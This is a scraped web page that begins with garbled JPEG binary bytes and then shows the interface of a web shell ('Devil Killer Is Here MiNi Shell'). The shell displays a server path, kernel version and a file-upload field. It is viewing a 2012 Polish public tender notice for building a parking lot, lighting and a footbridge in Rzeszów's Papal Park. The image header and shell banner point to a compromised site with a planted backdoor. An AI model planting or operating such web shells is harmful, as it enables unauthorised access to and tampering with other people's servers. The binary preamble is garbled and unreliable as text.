JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120927/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120927/368740-N-2012.html

<p class="kh_header"><b>Rzeszów: Budowa Parku Papieskiego etap B - część 3; obejmującą budowę parkingu za Katedrą wraz z ciągiem pieszo - jezdnym od strony ul. Łukasiewicza oraz kanalizacją deszczową, oświetleniem parku i mostkiem realizowaną w ramach zadania inwestycyjnego pn.: Budowa Parku Papieskiego.</b><br>
<b>Numer ogłoszenia: 368740 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej w Rzeszowie , Ul. Targowa 3, 35-064 Rzeszów, woj. podkarpackie, tel. 17 748 37 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.erzeszow.pl/zamowienia-publiczne/zamowienia-publiczne-jednostek-organizacyjnych-miasta/zzm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Parku Papieskiego etap B - część 3; obejmującą budowę parkingu za Katedrą wraz z ciągiem pieszo - jezdnym od strony ul. Łukasiewicza oraz kanalizacją deszczową, oświetleniem parku i mostkiem realizowaną w ramach zadania inwestycyjnego pn.: Budowa Parku Papieskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Budowa Parku Papieskiego etap B - część 3; obejmująca budowę parkingu za Katedrą wraz z ciągiem pieszo - jezdnym od strony ul. Łukasiewicza oraz kanalizacją deszczową, oświetleniem parku i mostkiem realizowana w ramach zadania inwestycyjnego pn.: Budowa Parku Papieskiego. 
Zamówienie obejmuje wykonanie części robót budowlanych wchodzących w zakres budowy Parku Papieskiego zlokalizowanego w Rzeszowie przy ul. Armii Krajowej. 
Zakres robót jest następujący:  
1. Budowa parkingu za Katedrą o nawierzchni z kostki brukowej betonowej gr. 8 cm i powierzchni ok. 1 320 m2 oraz chodnika z kostki brukowej betonowej gr. 6 cm i powierzchni ok. 107 m2
2. Budowa ciągu pieszo - jezdnego od strony ul. Łukasiewicza o nawierzchni z kostki brukowej betonowej gr. 8 cm i powierzchni ok. 1 009 m2
3. Budowa kanalizacji deszczowej - odwodnienie parkingu
4. Budowa oświetlenia parku w zakres której wchodzi ustawienie 48 szt. fundamentów prefabrykowanych i słupów oświetleniowych wraz z oprawami oraz montaż tablicy rozdzielczej i szafy sterowniczej na fundamentach prefabrykowanych
5. Budowa mostku nad rowem o konstrukcji stalowej opartej na słupkach żelbetonowych obłożonych płytami granitowymi
Szczegółowy zakres robót określa dołączona do niniejszego opisu dokumentacja projektowa w skład której wchodzą projekty, przedmiary robót i specyfikacje techniczne wykonania i odbioru robót. 
Ponieważ część Parku Papieskiego jest już wykonana i przy realizacji zostały wprowadzone pewne zmiany w stosunku do projektu zmiany te należy również wprowadzić przy realizacji robót objętych zamówieniem. Zmiany te zostały opisane w załączniku nr II - Wyjaśnienia.
Przed złożeniem oferty wykonawca powinien dokonać na własny koszt wizji lokalnej terenu w którym będzie realizowane zamówienie oraz zrealizowanej części parku i przy realizacji zamówienia zastosować takie materiały jak są tam obecnie zastosowane aby zachować jednolitość całego parku. Dotyczy to w szczególności: rodzaju i kolorystyki kostki brukowej, okładziny granitowej na mostku oraz słupów i opraw oświetleniowych.
Zamówienie należy wykonać zgodnie z projektem (przy uwzględnieniu wyjaśnień zawartych powyżej i w zał. nr II) przedmiarem robót, SST wykonania i odbioru robót oraz zasadami sztuki budowlanej i wiedzy technicznej. 
Wykonawca wykona zadanie z materiałów własnych. Materiały użyte do wykonania zamówienia winny spełniać wymagania dotyczące wyrobów budowlanych. 
Wymagania dotyczące wykonawcy:
1. W zakres zamówienia wchodzą wszystkie elementy związane z wykonaniem zamówienia jak: dostawa materiałów i urządzeń, montaż i ustawienie urządzeń, transport i składowanie ziemi urodzajnej do późniejszego wykorzystania, pozyskanie ziemi urodzajnej (humusu), obsługa geodezyjna, (wytyczenie, inwentaryzacja geodezyjna powykonawcza potwierdzona w ZUDP), koszty urządzenia i utrzymania placu budowy, odbiorów, koszty uzyskania we własnym imieniu decyzji na zajęcie pasa drogowego w celu prowadzenia robót przy połączeniach alejek z drogami publicznymi i budowie mostku nad rowem, itp. wynikające ze specyfiki robót i przepisów budowlanych. W przypadku oświetlenia parku należy również doliczyć odkopanie kabli a po ustawieniu słupów również wyrównanie terenu i odtworzenie zieleni.
2. Wykonawca zapewni sprzęt, urządzenia, robociznę i materiały potrzebne do wykonania badań na etapie przygotowania się do robót oraz podczas realizacji budowy zgodnie z wymaganiami zawartymi w Szczegółowych Specyfikacjach Technicznych. Koszty wykonania wszystkich próbek oraz przeprowadzenia badań ponosi wykonawca.
3. Wykonawca otrzyma dostęp do elektronicznego systemu Zarządzania i Monitorowania Inwestycji obowiązującego w Urzędzie Miasta Rzeszowa w zakresie realizowanego zadania i zobowiązany jest          z wykorzystaniem tego systemu:
1) prowadzić raportowanie postępu robót, w terminach ustalonych z Inspektorem nadzoru
2) sporządzać rozliczenia miesięczne za dany okres rozliczeniowy,
3) zamieszczać dokumentację fotograficzną postępu robót w terminach ustalonych z Inspektorem nadzoru.
4. Wykonawca bierze na siebie pełną odpowiedzialność za właściwe wykonanie robót, zapewnienie warunków bezpieczeństwa, oraz metody organizacyjno-techniczne stosowane na terenie budowy. 
5. Dopuszcza się zlecenie robót podwykonawcom przy spełnieniu następujących warunków: 
a) Jeśli część zamówienia ma być realizowana przez podwykonawców, to Wykonawca jest zobowiązany opisać w ofercie tą część zamówienia. 
b) Zawarcie przez Wykonawcę umowy o roboty budowlane z Podwykonawcą wymaga procedury określonej w art. 6471 Kodeksu cywilnego pod rygorem naliczania kar umownych.
c) Wykonawca jest zobowiązany do zawarcia umowy przelewu wierzytelności na rzecz Podwykonawcy, przysługujących mu od Zamawiającego za roboty wykonane przez Podwykonawcę. Wykonawca zobowiązany jest zawiadomić Zamawiającego najpóźniej w dniu doręczenia faktury, o przelewie Wierzytelności, przysługujących mu od Zamawiającego za roboty wykonane przez Podwykonawcę w ramach realizacji zamówienia.
d) Na podstawie zawiadomienia, o którym mowa w pkt. c. Zamawiający dokona przelewu należności na rzecz Podwykonawcy za wykonane przez niego roboty, na podstawie faktur Wykonawcy.
e) Wykonawca jest odpowiedzialny za działania, uchybienia i zaniedbania pracowników Podwykonawców.
f) W razie zaistnienia podejrzenia, iż na budowie roboty wykonuje podwykonawca, o czym Zamawiający nie został poinformowany w trybie art. 6471 Wykonawca będzie zobowiązany do złożenia Zamawiającemu wyjaśnień w tym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzielenie Wykonawcy wybranemu w niniejszym postępowaniu, zamówień uzupełniających w trybie zamówienia z wolnej ręki, które stanowić będą nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia te będą dotyczyć przedmiotu zamówienia określonego w niniejszej Specyfikacji i polegać będą na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.22.33.00-9, 45.23.31.61-5, 45.31.61.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.W niniejszym postępowaniu Zamawiający wymaga wniesienia wadium w kwocie 25 600,00 zł (słownie: dwadzieścia pięć tysięcy sześćset złotych 00/100).
2. Wadium może być wniesione w:
2.1 pieniądzu (przelew - Bank PEKAO S.A. O/Rzeszów nr: 56 1240 1792 1111 0010 3283 1466), 
2.2 poręczeniach bankowych lub poręczeniu spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
2.3 gwarancjach bankowych,
2.4 gwarancjach ubezpieczeniowych,
2.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3. Wadium wniesione w pieniądzu winno znaleźć się na rachunku Zamawiającego najpóźniej do godziny wyznaczonej jako termin składania ofert. 
4. Wadium wniesione w formie gwarancji i poręczeń powinno być sporządzone zgodnie z obowiązującymi przepisami i zawierać co najmniej następujące elementy:
4.1 nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego - Gmina Miasto Rzeszów - Zarząd Zieleni Miejskiej w Rzeszowie), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
4.2 kwotę gwarancji,
4.3 zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze żądanie zamawiającego w sytuacjach określonych w art. 46 ust. 4a lub art. 46 ust. 5 ustawy,
4.4 termin ważności gwarancji, przy czym okres jego ważności nie może być krótszy niż okres związania ofertą.
5. Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony z postępowania.
6. Wykonawca utraci wadium na rzecz Zamawiającego, jeżeli: odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie zabezpieczenia należytego wykonania umowy lub zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca przedłoży podpisane oświadczenie z art. 22 ust 1 Ustawy Pzp, o spełnieniu warunków udziału w postępowaniu, zgodnie ze wzorem oświadczenia stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał co najmniej 3 roboty budowlane w tym:
a) co najmniej jedna polegająca na remoncie, przebudowie lub budowie dróg lub ścieżek dla pieszych o nawierzchni z kostki brukowej o powierzchni co najmniej 500 m2,
b) co najmniej jedna polegająca na budowie, przebudowie lub wymianie oświetlenia zewnętrznego (ulicznego, parkowego) z ustawieniem co najmniej 25 szt. lamp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów o udostępnieniu osób zdolnych do wykonania zamówienia, tj.: 
1) Kierownik budowy - kierownik robót branży drogowej - wymagania:
a) uprawnienia budowlane w specjalności drogowej lub konstrukcyjno - budowlanej w ograniczonym zakresie lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
b) doświadczenie zawodowe - wykazanie się kierowaniem co najmniej jednym zadaniem polegającym na budowie, przebudowie lub remoncie nawierzchni z kostki brukowej o powierzchni - nie mniejszej niż 500 m2,
c) aktualne członkostwo w odpowiedniej izbie samorządu zawodowego.
2) Kierownik robót branży elektrycznej - wymagania:
a) uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektroenergetycznych i energetycznych w ograniczonym zakresie lub odpowiadające im uprawnienia wydane na podstawie obowiązujących wcześniej przepisów.
b) doświadczenie zawodowe - wykazanie się kierowaniem co najmniej jednym zadaniem polegającym na realizacji robót zakresie budowy, przebudowy lub wymiany oświetlenia zewnętrznego (uliczne, parkowe) z ustawieniem co najmniej 25 szt. lamp.
c) aktualne członkostwo w odpowiedniej izbie samorządu zawodowego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 500 000,00 z (słownie: pięćset tysięcy złotych 00/100). 
Do przeliczenia wartości finansowej określonej w niniejszym punkcie, a występującej w innej walucie niż PLN Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art. 26 ust. 2a ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Wypełniony formularz oferty, który stanowi załącznik nr 1 do SIWZ
3. Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem.
4. Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem.
5. Kosztorys ofertowy opracowany na podstawie załączonego projektu i przedmiaru robót wraz z tabelą elementów scalonych. 
Zamawiający oczekuje złożenia kosztorysu ofertowego na nośniku CD sporządzonego w programie Oferent na podstawie załączonego elektronicznego przedmiaru robót. Instrukcja oraz informacja o sposobie dostępu i przygotowania elektronicznego kosztorysu ofertowego znajduje się w załączniku nr V do Opisu przedmiotu zamówienia.
Jeżeli Wykonawca opracuje kosztorys ofertowy korzystając z powyższego programu, to zgodnie z opisem zamieszczonym w Instrukcji przygotowania elektronicznego kosztorysu ofertowego, należy go zapisać na nośniku CD (jako plik PDF) oraz wydrukować i podpisać. Następnie obie te wersje, elektroniczną i papierową, należy dołączyć do oferty. Ważne jest, aby wersja papierowa była zgodna z wersją elektroniczną, a potwierdzeniem tej zgodności będzie Kod WO (suma kontrolna), który w wersji papierowej jest widoczny na ostatniej stronie wydruku, a w wersji elektronicznej jest dostępny w programie oferent po kliknięciu na przycisk Sprawdź. Zamawiający nie wymaga złożenia wersji elektronicznej kosztorysu ofertowego w innej formie niż opisana powyżej.
6. Dowód wniesienia wadium. W przypadku, gdy Wykonawca wniesie wadium w pieniądzu winien dołączyć do oferty kopię polecenia przelewu na rachunek Zamawiającego potwierdzoną za zgodność z oryginałem. Wadium w pozostałych formach wpłaty należy w formie oryginału złożyć w siedzibie Zamawiającego (pok. 33, I piętro), a do oferty załączyć kopię potwierdzoną za zgodność z oryginałem przez upoważnionego przedstawiciela Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie:
1) zmiany terminu realizacji zamówienia, termin może być zmieniony w przypadku gdy opóźnienie w wykonaniu przedmiotu umowy spowodowane będzie konicznością, która wystąpiła po zawarciu umowy, np.: 
a) wystąpienia w trakcie prac budowlanych nieprzewidzianych okoliczności, np. kolizji z nie zaznaczonymi na mapie sieciami uzbrojenia terenu wymagającymi uzgodnień ZUDP, koniecznością wykonania dodatkowych wyburzeń i umocnień, badań archeologicznych lub wykryciem niewybuchów,
b) długotrwałych opadów deszczu, śniegu tj. trwających powyżej 7 dni, wystąpienia temperatur uniemożliwiających wykonywanie robót,
c) działania siły wyższej,
Za siłę wyższą nie uznaje się braku środków u Wykonawcy, nie dotrzymania zobowiązań przez jego kontrahentów oraz braku zezwoleń niezbędnych Wykonawcy do wykonania umowy.
Strony zobowiązują się do wzajemnego powiadomienia się o zaistnieniu siły wyższej i dokonania stosownych ustaleń celem wyeliminowania możliwych skutków działania siły wyższej. Powiadomienia, o których mowa w zdaniu poprzednim, należy dokonać pisemnie lub w inny dostępny sposób, niezwłocznie po fakcie wystąpienia siły wyższej. Do powiadomienia należy dołączyć dowody na poparcie zaistnienia siły wyższej
W przypadku wystąpienia jednej z ww. okoliczności Zamawiający wydłuży termin wykonania zamówienia.
3) zmiany wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług (VAT) - wynagrodzenie ulegnie zmianie stosownie do zmiany stawki podatku bez zmiany wynagrodzenia netto,
4) zmiany sposobu wykonania poszczególnych robót, za zgodą projektanta, przy zachowaniu parametrów oraz możliwości zmiany kwoty wynagrodzenia w przypadku zastosowania materiałów zamiennych, innych technologii lub rozwiązań, gdy zmiana taka jest korzystna dla Zamawiającego, nie spowoduje kosztów inwestycji lub wpłynie na przyśpieszenie terminu zakończenia robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
